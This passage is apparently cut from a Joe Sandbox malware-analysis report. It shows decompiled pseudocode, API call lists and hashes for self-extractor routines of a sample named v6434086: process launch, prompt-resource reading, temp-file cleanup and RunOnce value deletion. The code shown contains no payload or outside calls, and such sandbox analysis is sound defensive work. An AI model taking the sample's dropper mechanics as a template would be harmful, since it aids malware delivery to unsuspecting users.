                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E00BC44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0xbc8a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0xbc9a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0xbc9a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00BC411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0xbc9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00BC4033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BC4049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00BC405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00BC40A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00BC40DC
                                                                                                                                                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00BC40E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
• Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 5a3c322bce1b33cbf18abee525da4b48622a74d1489d10c69ee4a4af5d8100de
                                                                                                                                                                                                        • Instruction ID: 95e9ca28e0512109e9f7f7741f59206b2b59703dd5021cc90442fb71e731f4c0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a3c322bce1b33cbf18abee525da4b48622a74d1489d10c69ee4a4af5d8100de
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65319131641218ABEB209B65DC5DFAB77BCEB99705F1001ADF555E2161CB304E85CB21
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

[Control-flow graph for function bc51e5; legend: Executed / Not Executed]
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC51E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E00BC468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E00BC468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E00BC44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0xbc9124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0xbc9124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E00BC44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0xbc9124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E00BC44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        0x00bc524a
                                                                                                                                                                                                        0x00bc5250
                                                                                                                                                                                                        0x00bc5256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5256
                                                                                                                                                                                                        0x00bc5219
                                                                                                                                                                                                        0x00bc5223
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46A0
                                                                                                                                                                                                          • Part of subcall function 00BC468F: SizeofResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46A9
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00BC46C3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LoadResource.KERNEL32(00000000,00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46CC
                                                                                                                                                                                                          • Part of subcall function 00BC468F: LockResource.KERNEL32(00000000,?,00BC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46D3
                                                                                                                                                                                                          • Part of subcall function 00BC468F: memcpy_s.MSVCRT ref: 00BC46E5
                                                                                                                                                                                                          • Part of subcall function 00BC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00BC46EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00BC2F4D,?,00000002,00000000), ref: 00BC5201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00BC5250
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 7ba02e14a7ffe65fe58b9a7f42a72bcfd05e66909e98ab22cb5a077f73afede6
                                                                                                                                                                                                        • Instruction ID: 87380b0484c53bbb98ebd6366b97b16e65109e23a5be85427584f2c50ccf7299
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ba02e14a7ffe65fe58b9a7f42a72bcfd05e66909e98ab22cb5a077f73afede6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C41104B1300A05BFE3246B715C9AF3B61DDDBCD384B1044ADF642EB290DEB89C004238
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E00BC52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0xbc91e0; // 0x31d8ea8
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0xbc8a24 == 0 &&  *0xbc9a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0xbc8a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0xbc8a24 == 0 &&  *0xbc9a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00BC1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        					if(( *0xbc9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E00BC65E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00BC2390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0xbc8a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0xbc9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00BC1FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0xbc8a20 =  *0xbc8a20 & 0x00000000;
                                                                                                                                                                                                        				return E00BC6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(031D8EA8,00000080,?,00000000), ref: 00BC52F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(031D8EA8), ref: 00BC52FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(031D8EA8,?,00000000), ref: 00BC5305
                                                                                                                                                                                                        • LocalFree.KERNEL32(031D8EA8), ref: 00BC530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00BC11FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00BC5363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00BC5334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-3290032183
                                                                                                                                                                                                        • Opcode ID: 13d4d1c6a3bd50f62276aa9c0b9e9fd94f4f2ce881139e4f3ad3172e78f73767
                                                                                                                                                                                                        • Instruction ID: b290e3d5b9264e46b4e5204dea38c7bca2554423f2a92a4268a5bbd9d71eb4fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13d4d1c6a3bd50f62276aa9c0b9e9fd94f4f2ce881139e4f3ad3172e78f73767
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7217C31500648DFDB319B24DD09F6977E4FB98795F0401ADF446A71A0CFB4AC84CB54
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC1FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0xbc8530 != 0) {
                                                                                                                                                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                        					if(_t4 == 0) {
                                                                                                                                                                                                        						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                        						return RegCloseKey(_v8);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00BC538C,?,?,00BC538C), ref: 00BC2005
                                                                                                                                                                                                        • RegDeleteValueA.KERNELBASE(00BC538C,wextract_cleanup2,?,?,00BC538C), ref: 00BC2017
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00BC538C,?,?,00BC538C), ref: 00BC2020
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 849931509-3354236729
                                                                                                                                                                                                        • Opcode ID: 614d00708ad21e34ed8aff21a533a36edeb8820abe7978d8be5fcf70e6f33b67
                                                                                                                                                                                                        • Instruction ID: ff673b5a32791d56db87b4bb2b620d24e912a26fc8784cd02a2ca5a8da19411a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 614d00708ad21e34ed8aff21a533a36edeb8820abe7978d8be5fcf70e6f33b67
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEE04F30550318BBD7229B90EC0AF597BA9F708785F1001D9B904A2061EFA15A14D605
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00BC4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				long _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        				long _t35;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				struct HWND__* _t37;
                                                                                                                                                                                                        				long _t38;
                                                                                                                                                                                                        				long _t39;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				long _t44;
                                                                                                                                                                                                        				long _t45;
                                                                                                                                                                                                        				long _t46;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				long _t51;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				long _t59;
                                                                                                                                                                                                        				char* _t63;
                                                                                                                                                                                                        				long _t64;
                                                                                                                                                                                                        				CHAR* _t71;
                                                                                                                                                                                                        				CHAR* _t74;
                                                                                                                                                                                                        				int _t75;
                                                                                                                                                                                                        				signed int _t76;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                                        				_t29 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                        				_v8 = _t30;
                                                                                                                                                                                                        				_t75 = _a8;
                                                                                                                                                                                                        				if( *0xbc91d8 == 0) {
                                                                                                                                                                                                        					_t32 = _a4;
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 == 0) {
                                                                                                                                                                                                        						_t33 = E00BC4E99(_t75);
                                                                                                                                                                                                        						L35:
                                                                                                                                                                                                        						return E00BC6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t35 = _t32 - 1;
                                                                                                                                                                                                        					__eflags = _t35;
                                                                                                                                                                                                        					if(_t35 == 0) {
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						_t33 = 0;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t36 = _t35 - 1;
                                                                                                                                                                                                        					__eflags = _t36;
                                                                                                                                                                                                        					if(_t36 == 0) {
                                                                                                                                                                                                        						_t37 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        						__eflags = _t37;
                                                                                                                                                                                                        						if(_t37 != 0) {
                                                                                                                                                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t54 = 0xbc91e4;
                                                                                                                                                                                                        						_t58 = 0xbc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t38 =  *_t58;
                                                                                                                                                                                                        							_t58 =  &(_t58[1]);
                                                                                                                                                                                                        							__eflags = _t38;
                                                                                                                                                                                                        						} while (_t38 != 0);
                                                                                                                                                                                                        						_t59 = _t58 - 0xbc91e5;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t73 =  &(_t71[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t39 =  *_t71;
                                                                                                                                                                                                        							_t71 =  &(_t71[1]);
                                                                                                                                                                                                        							__eflags = _t39;
                                                                                                                                                                                                        						} while (_t39 != 0);
                                                                                                                                                                                                        						_t69 = _t71 - _t73;
                                                                                                                                                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							L3:
                                                                                                                                                                                                        							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xbc91e4;
                                                                                                                                                                                                        						_t30 = E00BC4702( &_v268, 0xbc91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t41 = E00BC476D( &_v268, __eflags);
                                                                                                                                                                                                        						__eflags = _t41;
                                                                                                                                                                                                        						if(_t41 == 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0x180);
                                                                                                                                                                                                        						_t30 = E00BC4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                        						_t75 = _t30;
                                                                                                                                                                                                        						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                        						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E00BC47E0( &_v268);
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xbc93f4 =  *0xbc93f4 + 1;
                                                                                                                                                                                                        						_t33 = _t75;
                                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t44 = _t36 - 1;
                                                                                                                                                                                                        					__eflags = _t44;
                                                                                                                                                                                                        					if(_t44 == 0) {
                                                                                                                                                                                                        						_t54 = 0xbc91e4;
                                                                                                                                                                                                        						_t63 = 0xbc91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t45 =  *_t63;
                                                                                                                                                                                                        							_t63 =  &(_t63[1]);
                                                                                                                                                                                                        							__eflags = _t45;
                                                                                                                                                                                                        						} while (_t45 != 0);
                                                                                                                                                                                                        						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                        						_t64 = _t63 - 0xbc91e5;
                                                                                                                                                                                                        						__eflags = _t64;
                                                                                                                                                                                                        						_t69 =  &(_t74[1]);
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t46 =  *_t74;
                                                                                                                                                                                                        							_t74 =  &(_t74[1]);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        						} while (_t46 != 0);
                                                                                                                                                                                                        						_t73 = _t74 - _t69;
                                                                                                                                                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                        						__eflags = _t30 - 0x104;
                                                                                                                                                                                                        						if(_t30 >= 0x104) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 = 0xbc91e4;
                                                                                                                                                                                                        						_t30 = E00BC4702( &_v268, 0xbc91e4,  *(_t75 + 4));
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                        						_t30 = E00BC4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						E00BC4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                        						__eflags = _t50;
                                                                                                                                                                                                        						if(_t50 != 0) {
                                                                                                                                                                                                        							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                        							__eflags = _t51;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t51 = 0x80;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                        						__eflags = _t30;
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t33 = 1;
                                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t30 = _t44 - 1;
                                                                                                                                                                                                        					__eflags = _t30;
                                                                                                                                                                                                        					if(_t30 == 0) {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_a4 == 3) {
                                                                                                                                                                                                        					_t30 = E00BC4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L3;
                                                                                                                                                                                                        			}































                                                                                                                                                                                                        0x00bc4dfc
                                                                                                                                                                                                        0x00bc4dfe
                                                                                                                                                                                                        0x00bc4dff
                                                                                                                                                                                                        0x00bc4dff
                                                                                                                                                                                                        0x00bc4e03
                                                                                                                                                                                                        0x00bc4e08
                                                                                                                                                                                                        0x00bc4e0a
                                                                                                                                                                                                        0x00bc4e0f
                                                                                                                                                                                                        0x00bc4d03
                                                                                                                                                                                                        0x00bc4d03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d03
                                                                                                                                                                                                        0x00bc4e18
                                                                                                                                                                                                        0x00bc4e20
                                                                                                                                                                                                        0x00bc4e25
                                                                                                                                                                                                        0x00bc4e27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e33
                                                                                                                                                                                                        0x00bc4e38
                                                                                                                                                                                                        0x00bc4e3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e40
                                                                                                                                                                                                        0x00bc4e51
                                                                                                                                                                                                        0x00bc4e56
                                                                                                                                                                                                        0x00bc4e5b
                                                                                                                                                                                                        0x00bc4e5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e6a
                                                                                                                                                                                                        0x00bc4e6f
                                                                                                                                                                                                        0x00bc4e71
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e77
                                                                                                                                                                                                        0x00bc4e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4e7d
                                                                                                                                                                                                        0x00bc4d25
                                                                                                                                                                                                        0x00bc4d25
                                                                                                                                                                                                        0x00bc4d28
                                                                                                                                                                                                        0x00bc4d36
                                                                                                                                                                                                        0x00bc4d3b
                                                                                                                                                                                                        0x00bc4d40
                                                                                                                                                                                                        0x00bc4d40
